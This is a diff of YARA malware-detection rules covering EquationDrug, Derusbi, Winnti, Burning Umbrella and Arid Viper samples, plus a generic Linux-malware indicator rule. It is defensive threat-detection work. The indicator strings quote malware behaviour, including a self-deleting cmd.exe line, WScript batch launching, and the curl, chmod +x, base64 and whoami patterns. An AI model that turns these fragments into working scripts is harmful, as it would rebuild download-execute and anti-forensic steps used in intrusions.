+		hash5 = "95b6e427883f402db73234b84a84015ad7f3456801cb9bb19df4b11739ea646d"
+		hash6 = "1419ba36aae1daecc7a81a2dfb96631537365a5b34247533d59a70c1c9f58da2"
+		hash7 = "6a5a9b0ae10ce6a0d5e1f7d21d8ea87894d62d0cda00db005d8d0de17cae7743"
+		hash8 = "74e348068f8851fec1b3de54550fe09d07fb85b7481ca6b61404823b473885bb"
+		hash9 = "adb9c2fe930fae579ce87059b4b9e15c22b6498c42df01db9760f75d983b93b2"
+		hash0 = "23f28b5c4e94d0ad86341c0b9054f197c63389133fcd81dd5e0cf59f774ce54b"
 
 	strings:
-		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s1 = "IP Transport Driver" fullword wide
-		$s2 = "tdip.sys" fullword wide
-		$s3 = "sys\\tdip.dbg" fullword ascii
-		$s4 = "dip.sys" fullword ascii
-		$s5 = "\\Device\\%ws_%ws" wide
-		$s6 = "\\DosDevices\\%ws" wide
-		$s7 = "\\Device\\%ws" wide
+		$s1 = "c:\\tmp\\tran.exe" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "11675b4db0e7df7b29b1c1ef6f88e2e1" or pe.imphash ( ) == "364e1f68e2d412db34715709c68ba467" or pe.exports ( "deKernel" ) or 1 of them )
 }
-rule SIGNATURE_BASE_Equationdrug_Networksniffer3
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_19 : FILE
 {
 	meta:
-		description = "EquationDrug - Network Sniffer - tdip.sys"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "c6b1658b-cbc6-535a-a3a2-15ce3cf6e4f6"
-		date = "2015-03-11"
-		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L440-L455"
+		description = "Detects malware sample from Burning Umbrella report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8ab55e80-5d28-5a5f-a1cc-725ba6720e4b"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L315-L332"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "14599516381a9646cd978cf962c4f92386371040"
-		logic_hash = "18c516fe0cd74e7a02ee15260abf3d27bba992492e6042a148abdee3086a9a00"
+		logic_hash = "218c16d1b67e3e80dc7fdaf67a869e92b39744cb336e70761ac960da36c00372"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "05e2912f2a593ba16a5a094d319d96715cbecf025bf88bb0293caaf6beb8bc20"
+		hash2 = "e7bbdb275773f43c8e0610ad75cfe48739e0a2414c948de66ce042016eae0b2e"
 
 	strings:
-		$s0 = "Corporation. All rights reserved." fullword wide
-		$s1 = "IP Transport Driver" fullword wide
-		$s2 = "tdip.sys" fullword wide
-		$s3 = "tdip.pdb" fullword ascii
+		$s1 = "Cryption.dll" fullword ascii
+		$s2 = "tran.exe" fullword ascii
+		$s3 = "Kernel.dll" fullword ascii
+		$s4 = "Now ready to get the file %s!" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
 }
-rule SIGNATURE_BASE_Equationdrug_Volrec_Driver
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_20 : FILE
 {
 	meta:
-		description = "EquationDrug - Collector plugin for Volrec - msrstd.sys"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "db4f3f65-bdc4-565d-ad59-25a16ec7c9d2"
-		date = "2015-03-11"
-		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L457-L471"
+		description = "Detects malware sample from Burning Umbrella report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1a39a76a-31e2-5d6e-82cb-ea38d503b6a9"
+		date = "2018-05-04"
+		modified = "2023-01-06"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L334-L355"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ee2b504ad502dc3fed62d6483d93d9b1221cdd6c"
-		logic_hash = "24b8202a8590ddb1dd76e01499d02282ad40a6fd6f6b9020040381a370e91f40"
+		logic_hash = "e2739a89451a4eba0bae345203dd4c0e26f715bb079830e36c772861fdd0f4de"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5c12379cd7ab3cb03dac354d0e850769873d45bb486c266a893c0daa452aa03c"
+		hash2 = "172cd90fd9e31ba70e47f0cc76c07d53e512da4cbfd197772c179fe604b75369"
+		hash3 = "1ce88e98c8b37ea68466657485f2c01010a4d4a88587ba0ae814f37680a2e7a8"
 
 	strings:
-		$s0 = "msrstd.sys" fullword wide
-		$s1 = "msrstd.pdb" fullword ascii
-		$s2 = "msrstd driver" fullword wide
+		$s1 = "Wordpad.Document.1\\shell\\open\\command\\" wide
+		$s2 = "%s\\shell\\Open\\command" fullword wide
+		$s3 = "expanding computer" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "bac338bfe2685483c201e15eae4352d5" or 2 of them )
 }
-rule SIGNATURE_BASE_Equationdrug_Kernelrootkit
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_21 : FILE
 {
 	meta:
-		description = "EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92491e30-4041-5c8b-8e4e-7bc2b1d3234b"
-		date = "2015-03-11"
-		modified = "2023-01-06"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L473-L493"
+		id = "2193e4b6-b71c-5031-8e43-fdd7177ad05c"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L357-L376"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "597715224249e9fb77dc733b2e4d507f0cc41af6"
-		logic_hash = "4b41af8656ada1b4db7ec11f65aeb2d335f424d8557cfa74a064b40c65627012"
+		logic_hash = "4fdb162575bd108bb35e5c8ed10f7cac7539a15349218222dbb82d8eae8ad4bb"
 		score = 75
-		quality = 60
-		tags = ""
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4b7b9c2a9d5080ccc4e9934f2fd14b9d4e8f6f500889bf9750f1d672c8724438"
 
 	strings:
-		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s1 = "Parmsndsrv.dbg" fullword ascii
-		$s2 = "\\Registry\\User\\CurrentUser\\" wide
-		$s3 = "msndsrv.sys" fullword wide
-		$s5 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Control\\Windows" wide
-		$s6 = "\\Device\\%ws_%ws" wide
-		$s7 = "\\DosDevices\\%ws" wide
-		$s9 = "\\Device\\%ws" wide
+		$s1 = "c:\\windows\\ime\\setup.exe" fullword ascii
+		$s2 = "ws.run \"later.bat /start\",0Cet " fullword ascii
+		$s3 = "del later.bat" fullword ascii
+		$s4 = "mycrs.xls" fullword ascii
+		$a1 = "-el -s2 \"-d%s\" \"-p%s\" \"-sp%s\"" fullword ascii
+		$a2 = "<set ws=wscript.createobject(\"wscript.shell\")" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationdrug_Keylogger
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_22 : FILE
 {
 	meta:
-		description = "EquationDrug - Key/clipboard logger driver - msrtvd.sys"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "57b6af34-577b-58ec-9a9e-91911c32270b"
-		date = "2015-03-11"
-		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L495-L510"
+		description = "Detects malware sample from Burning Umbrella report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "90c6cda9-95a0-5de7-b1cd-110c238d993d"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L378-L395"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b93aa17b19575a6e4962d224c5801fb78e9a7bb5"
-		logic_hash = "b5db0e6e24979b07cd180fed11545daef281e7b0858a7de001a83c2cbc186557"
+		logic_hash = "af2d7917f54ca365465383484b6d19a941d4801898d162a6d3afa7b7c8491a0f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fa116cf9410f1613003ca423ad6ca92657a61b8e9eda1b05caf4f30ca650aee5"
 
 	strings:
-		$s0 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" wide
-		$s2 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\En" wide
-		$s3 = "\\DosDevices\\Gk" wide
-		$s5 = "\\Device\\Gk0" wide
+		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\" ascii
+		$s3 = "Content-Disposition: form-data; name=\"txt\"; filename=\"" fullword ascii
+		$s4 = "Fail To Enum Service" fullword ascii
+		$s5 = "Host Power ON Time" fullword ascii
+		$s6 = "%d Hours %2d Minutes %2d Seconds " fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 4 of them
 }
-rule SIGNATURE_BASE_Equationdrug_Platformorchestrator
+rule SIGNATURE_BASE_MAL_Airdviper_Sample_Apr18_1 : FILE
 {
 	meta:
-		description = "EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "ce19ed3c-9dd9-5cb0-99fe-c04fde057293"
-		date = "2015-03-11"
-		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L538-L555"
+		description = "Detects Arid Viper malware sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "00f118d1-be1c-5f50-a50f-591f824a1a53"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L398-L422"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "febc4f30786db7804008dc9bc1cebdc26993e240"
-		logic_hash = "26c3b84a00702f155daa50c8f17e5f37e1aac46adde8a06a711e732a4cd806e9"
+		logic_hash = "cbe1f36320eb9640ffbb6495faf7e5a062c5929d022bb56cbf0ebee810ef4e94"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9f453f1d5088bd17c60e812289b4bb0a734b7ad2ba5a536f5fd6d6ac3b8f3397"
 
 	strings:
-		$s0 = "SERVICES.EXE" fullword wide
-		$s1 = "\\command.com" wide
-		$s2 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s3 = "LSASS.EXE" fullword wide
-		$s4 = "Windows Configuration Services" fullword wide
-		$s8 = "unilay.dll" fullword ascii
+		$x1 = "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"%s\"" fullword ascii
+		$x2 = "daenerys=%s&" ascii
+		$x3 = "betriebssystem=%s&anwendung=%s&AV=%s" ascii
+		$s1 = "Taskkill /IM  %s /F &  %s" fullword ascii
+		$s2 = "/api/primewire/%s/requests/macKenzie/delete" fullword ascii
+		$s3 = "\\TaskWindows.exe" ascii
+		$s4 = "MicrosoftOneDrives.exe" fullword ascii
+		$s5 = "\\SeanSansom.txt" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 6000KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Equationdrug_Networksniffer5
+rule SIGNATURE_BASE_MAL_Winnti_Sample_May18_1 : FILE
 {
 	meta:
-		description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
+		description = "Detects malware sample from Burning Umbrella report - Generic Winnti Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9eac2c51-3ad7-5346-a985-39733bc204c2"
-		date = "2015-03-11"
-		modified = "2023-01-06"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L557-L575"
+		id = "c2f3339e-269f-5a51-8db6-06e54a707b3a"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L426-L440"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "09399b9bd600d4516db37307a457bc55eedcbd17"
-		logic_hash = "84f009e2ef639e5270273a7d9dd2542fdf1386c4c8363071d711e2333a112cd1"
+		logic_hash = "e235396de278120cbc4700f239c41e7f21e97ba111c07022ae505de540dda2bc"
 		score = 75
-		quality = 60
-		tags = ""
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41"
 
 	strings:
-		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s1 = "\\Registry\\User\\CurrentUser\\" wide
-		$s2 = "atmdkdrv.sys" fullword wide
-		$s4 = "\\Device\\%ws_%ws" wide
-		$s5 = "\\DosDevices\\%ws" wide
-		$s6 = "\\Device\\%ws" wide
+		$s1 = "wireshark" fullword wide
+		$s2 = "procexp" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Equationdrug_Filesystem_Filter
+
+rule SIGNATURE_BASE_MAL_Visel_Sample_May18_1 : FILE
 {
 	meta:
-		description = "EquationDrug - Filesystem filter driver - volrec.sys, scsi2mgr.sys"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "7077daf6-3d51-5ff2-bc74-95cb169a7cd2"
-		date = "2015-03-11"
-		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L577-L591"
+		description = "Detects Visel malware sample from Burning Umbrella report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a244461a-380c-56e6-a891-131f6e13c280"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L442-L460"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "57fa4a1abbf39f4899ea76543ebd3688dcc11e13"
-		logic_hash = "5da0c279da1b84a41e7d15df3c19cd50af1872156f133de0a367b9140425aa11"
+		logic_hash = "3200e3224e037a116451b09ce265c1794a05406876376531ac81eb720fcb6945"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "35db8e6a2eb5cf09cd98bf5d31f6356d0deaf4951b353fc513ce98918b91439c"
 
 	strings:
-		$s0 = "volrec.sys" fullword wide
-		$s1 = "volrec.pdb" fullword ascii
-		$s2 = "Volume recognizer driver" fullword wide
+		$s2 = "print32.dll" fullword ascii
+		$s3 = "c:\\a\\b.txt" fullword ascii
+		$s4 = "\\temp\\s%d.dat" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.exports ( "szFile" ) or 2 of them )
 }
-rule SIGNATURE_BASE_Apt_Equation_Keyword : FILE
+rule SIGNATURE_BASE_SUSP_LNX_Linux_Malware_Indicators_Aug20_1 : FILE
 {
 	meta:
-		description = "Rule to detect Equation group's keyword in executable file"
-		author = "Florian Roth"
-		id = "a7d4eda5-f390-5099-9c46-bf74a878b4f0"
-		date = "2015-09-26"
-		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L593-L604"
+		description = "Detects indicators often found in linux malware samples. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness."
+		author = "Florian Roth (Nextron Systems)"
+		id = "9a1093a6-0239-5d1c-aa30-1ca725941583"
+		date = "2020-08-03"
+		modified = "2026-01-04"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_lnx_malware_indicators.yar#L1-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d9a2b31d078eabbc930e9ec06e5ead5a6cda4eebf1c0ebe8164caf75a9d3cba6"
-		score = 75
+		logic_hash = "1d07d424f2a66b60e55d21dff6d4c4f9f2591c3ab622dcfbc1cd989d28b44017"
+		score = 65
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$a1 = "Backsnarf_AB25" wide
-		$a2 = "Backsnarf_AB25" ascii
+		$s1 = "&& chmod +x" ascii
+		$s2 = "|base64 -" ascii
+		$s3 = " /tmp" ascii
+		$s4 = "|curl " ascii
+		$s5 = "whoami" ascii fullword
+		$fp1 = "WITHOUT ANY WARRANTY" ascii
+		$fp2 = "postinst" ascii fullword
+		$fp3 = "THIS SOFTWARE IS PROVIDED" ascii fullword
+		$fp4 = "Free Software Foundation" ascii fullword
+		$fp5 = "Too many sessions open! Use ssh_channel.close() or 'with'!"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $a* )
+		filesize < 400KB and 3 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Derusbi_Kernel : FILE
+rule SIGNATURE_BASE_Winnti_Signing_Cert : FILE
 {
 	meta:
-		description = "Derusbi Driver version"
-		author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
-		id = "a60ab93a-e2be-53ee-a7da-56c763bc5533"
-		date = "2015-12-09"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_derusbi.yar#L9-L22"
+		description = "Detects a signing certificate used by the Winnti APT group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0cf185eb-fb8d-5e1f-9089-4f36eb4798de"
+		date = "2015-10-10"
+		modified = "2025-08-11"
+		reference = "https://securelist.com/analysis/publications/72275/i-am-hdroot-part-1/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L9-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d5a0ce0b0116c3a84d52c22369dbf3cb9cf3ad8f8a05cea5565ba9bb99255fab"
+		logic_hash = "6fd5f2808e7d683b9c4b7f5d4ccfd0eb87037eb2e70700b2c083db8c6ddf4a26"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a9a8dc4ae77b1282f0c8bdebd2643458fc1ceb3145db4e30120dd81676ff9b61"
+		hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
 
 	strings:
-		$token1 = "$$$--Hello"
-		$token2 = "Wrod--$$$"
-		$class = ".?AVPCC_BASEMOD@@"
+		$s1 = "Guangzhou YuanLuo Technology Co." ascii
+		$s2 = "Guangzhou YuanLuo Technology Co.,Ltd" ascii
+		$s3 = "$Asahi Kasei Microdevices Corporation0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $token1 and $token2 and $class
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
 }
-rule SIGNATURE_BASE_Derusbi_Linux : FILE
+rule SIGNATURE_BASE_Winnti_Malware_Nsiproxy : FILE
 {
 	meta:
-		description = "Derusbi Server Linux version"
-		author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
-		id = "2b33afb5-be87-5d41-b05e-b99d0c1d8ed9"
-		date = "2015-12-09"
-		modified = "2023-12-05"
+		description = "Detects a Winnti rootkit"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9b14541c-6077-5f3b-8f73-ff3d283bf209"
+		date = "2015-10-10"
+		modified = "2025-08-11"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_derusbi.yar#L24-L39"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L28-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "68d5af17b33d1aa0388516e5d2a1ad29c22dc04451e232dfbdf1ef0714baeb10"
+		logic_hash = "742b091cc630ecea995be8d022eabadef1725dbd952f66a9ca62ecdee6985733"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
+		hash2 = "cf1e006694b33f27d7c748bab35d0b0031a22d193622d47409b6725b395bffb0"
+		hash3 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
+		hash4 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
+		hash5 = "ba7ccd027fd2c826bbe8f2145d5131eff906150bd98fe25a10fbee2c984df1b8"
 
 	strings:
-		$PS1 = "PS1=RK# \\u@\\h:\\w \\$"
-		$cmd = "unset LS_OPTIONS;uname -a"
-		$pname = "[diskio]"
-		$rkfile = "/tmp/.secure"
-		$ELF = "\x7fELF"
+		$x1 = "\\Driver\\nsiproxy" wide
+		$a1 = "\\Device\\StreamPortal" wide
+		$a2 = "\\Device\\PNTFILTER" wide
+		$s1 = "Cookie: SN=" fullword ascii
+		$s2 = "\\BaseNamedObjects\\_transmition_synchronization_" wide
+		$s3 = "Winqual.sys" fullword wide
+		$s4 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" wide
+		$s5 = "http://www.wasabii.com.tw 0" fullword ascii
 
 	condition:
-		$ELF at 0 and $PS1 and $cmd and $pname and $rkfile
+		uint16( 0 ) == 0x5a4d and $x1 and 1 of ( $a* ) and 2 of ( $s* )
 }
-rule SIGNATURE_BASE_Derusbi_Kernel_Driver_WD_UDFS : FILE
+rule SIGNATURE_BASE_Winnti_Malware_Updatedll : FILE
 {
 	meta:
-		description = "Detects Derusbi Kernel Driver"
+		description = "Detects a Winnti malware - Update.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "51d80d19-f87f-5b09-ac49-08ebcb464013"
-		date = "2015-12-15"
-		modified = "2023-12-05"
-		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_derusbi.yar#L48-L79"
+		id = "c6896191-d856-55f2-a47f-621a4f10d0c7"
+		date = "2015-10-10"
+		modified = "2025-08-11"
+		reference = "VTI research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L56-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bea8dafbef01ca8cf747a1f24804c0fb7868db09ce8091ff93c9c5d67d95ca3e"
-		score = 80
+		logic_hash = "4b483e77106cc0e2f8ed2398de8b34b8246472875ad3e0612fa06cac96b7e6aa"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016"
 		hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
 		hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58"
-		hash4 = "e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59"
+		hash4 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
 
 	strings:
-		$x1 = "\\\\.\\pipe\\usbpcex%d" fullword wide
-		$x2 = "\\\\.\\pipe\\usbpcg%d" fullword wide
-		$x3 = "\\??\\pipe\\usbpcex%d" fullword wide
-		$x4 = "\\??\\pipe\\usbpcg%d" fullword wide
-		$x5 = "$$$--Hello" fullword ascii
-		$x6 = "Wrod--$$$" fullword ascii
+		$c1 = "'Wymajtec$Tima Stempijg Sarviges GA -$G2" fullword ascii
+		$c2 = "AHDNEAFE1.sys" fullword ascii
+		$c3 = "SOTEFEHJ3.sys" fullword ascii
+		$c4 = "MainSYS64.sys" fullword ascii
 		$s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" wide
 		$s2 = "Update.dll" fullword ascii
-		$s3 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" wide
-		$s4 = "\\Driver\\nsiproxy" wide
-		$s5 = "HOST: %s" fullword ascii
+		$s3 = "\\\\.\\pipe\\usbpcex%d" fullword wide
+		$s4 = "\\\\.\\pipe\\usbpcg%d" fullword wide
+		$s5 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" wide
+		$s6 = "\\??\\pipe\\usbpcg%d" fullword wide
+		$s7 = "\\??\\pipe\\usbpcex%d" fullword wide
+		$s8 = "HOST: %s" fullword ascii
+		$s9 = "$$$--Hello" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 2 of ( $x* ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( 1 of ( $c* ) and 3 of ( $s* ) ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Derusbi_Code_Signing_Cert : FILE
+rule SIGNATURE_BASE_Winnti_Malware_FWPK : FILE
 {
 	meta:
-		description = "Detects an executable signed with a certificate also used for Derusbi Trojan - suspicious"
+		description = "Detects a Winnti malware - FWPKCLNT.SYS"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d123fde9-0182-5232-a716-b76e8d9830c4"
-		date = "2015-12-15"
-		modified = "2023-12-05"
-		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_derusbi.yar#L81-L96"
